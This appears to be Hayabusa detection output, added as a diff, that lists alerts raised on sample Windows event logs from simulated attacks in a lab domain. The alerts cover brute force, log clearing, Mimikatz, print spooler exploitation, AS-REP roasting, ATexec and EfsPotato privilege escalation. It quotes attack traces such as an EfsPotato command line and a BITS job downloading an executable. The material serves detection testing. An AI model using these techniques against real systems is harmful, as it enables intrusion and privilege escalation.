+2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  SubStatus: 0xc0000064  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
+2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER  :  Workstation FS01  :  Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
+2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  SubStatus: 0xc0000064  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
+2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER  :  Workstation FS01  :  Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
+2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  SubStatus: 0xc0000064  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
+2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$  :  Target User: sshd_4332  :  IP Address: -  :  Process: C:\Program Files\OpenSSH-Win64\sshd.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
+2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4624,low,Logon Type 5 - Service,User: sshd_4332  :  Workstation: -  :  IP Address: -  :  Port: -  :  LogonID: 0x47a203c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
+2021-05-22 05:43:18.227 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$  :  Target User: admmig  :  IP Address: -  :  Process: C:\Program Files\OpenSSH-Win64\sshd.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
+2021-05-22 05:43:22.562 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
+2021-05-22 05:43:22.562 +09:00,-,-,medium,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:5 IpAddress:- timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,-
+2021-05-22 05:43:49.345 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
+2021-05-22 05:43:50.131 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
+2021-05-22 05:43:50.607 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
+2021-05-22 05:43:50.866 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan  :  Type: 8  :  Workstation: FS01  :  IP Address: -  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
+2021-05-23 06:56:57.685 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx
+2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx
+2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx
+2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 47156  :  LogonID: 0x312517c1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,critical,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:29.726 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 47160  :  LogonID: 0x31251a6a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,critical,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:34.373 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 65333  :  LogonID: 0x31251ce4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:34.375 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 65335  :  LogonID: 0x31251d11,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 65336  :  LogonID: 0x31251d23,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-26 22:02:34.380 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 65337  :  LogonID: 0x31251d36,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
+2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,medium,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx
+2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,informational,Kerberos TGT was requested,User: admin-test  :  Service: krbtgt  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0  :  PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx
+2021-06-01 23:06:34.542 +09:00,fs01.offsec.lan,4720,medium,Local user account created,User: WADGUtilityAccount  :  SID:S-1-5-21-1081258321-37805170-3511562335-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx"
+2021-06-01 23:08:21.225 +09:00,fs01.offsec.lan,4720,medium,Local user account created,User: elie  :  SID:S-1-5-21-1081258321-37805170-3511562335-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx"
+2021-06-03 21:17:56.988 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx
+2021-06-03 21:18:12.941 +09:00,fs01.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx
+2021-06-03 21:18:12.942 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 56061  :  LogonID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx
+2021-06-04 03:34:12.672 +09:00,fs01.offsec.lan,4104,high,Windows Firewall Profile Disabled,,rules/sigma/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx
+2021-06-04 04:17:44.873 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
+2021-06-04 04:39:52.893 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx
+2021-06-04 04:39:52.895 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx
+2021-06-04 04:39:53.056 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx
+2021-06-04 17:41:47.982 +09:00,exchange01.offsec.lan,6,high,Failed MSExchange Transport Agent Installation,,rules/sigma/other/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx
+2021-06-04 17:41:48.041 +09:00,exchange01.offsec.lan,6,high,Failed MSExchange Transport Agent Installation,,rules/sigma/other/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx
+2021-06-11 06:21:20.636 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 51503  :  LogonID: 0x5a4175e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-11 06:21:26.357 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 56594  :  LogonID: 0x5a41984,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. arg.).evtx
+2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\bouWFQYO.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx
+2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\bouWFQYO.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\bouWFQYO.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx
+2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\bouWFQYO.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\bouWFQYO.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx
+2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\bouWFQYO.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-13 15:17:18.087 +09:00,sv-dc.hinokabegakure-no-sato.local,59,informational,Bits Job Creation,Job Title: test  :  URL: http://192.168.10.254:80/calc.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/YamatoSecurity/T1197_BITS Jobs/Windows-BitsClient.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: c:\temp\EfsPotato.exe  whoami  :  Path: C:\temp\EfsPotato.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.844 +09:00,LAPTOP-JU4M3I0E,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: c:\temp\EfsPotato.exe  whoami,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
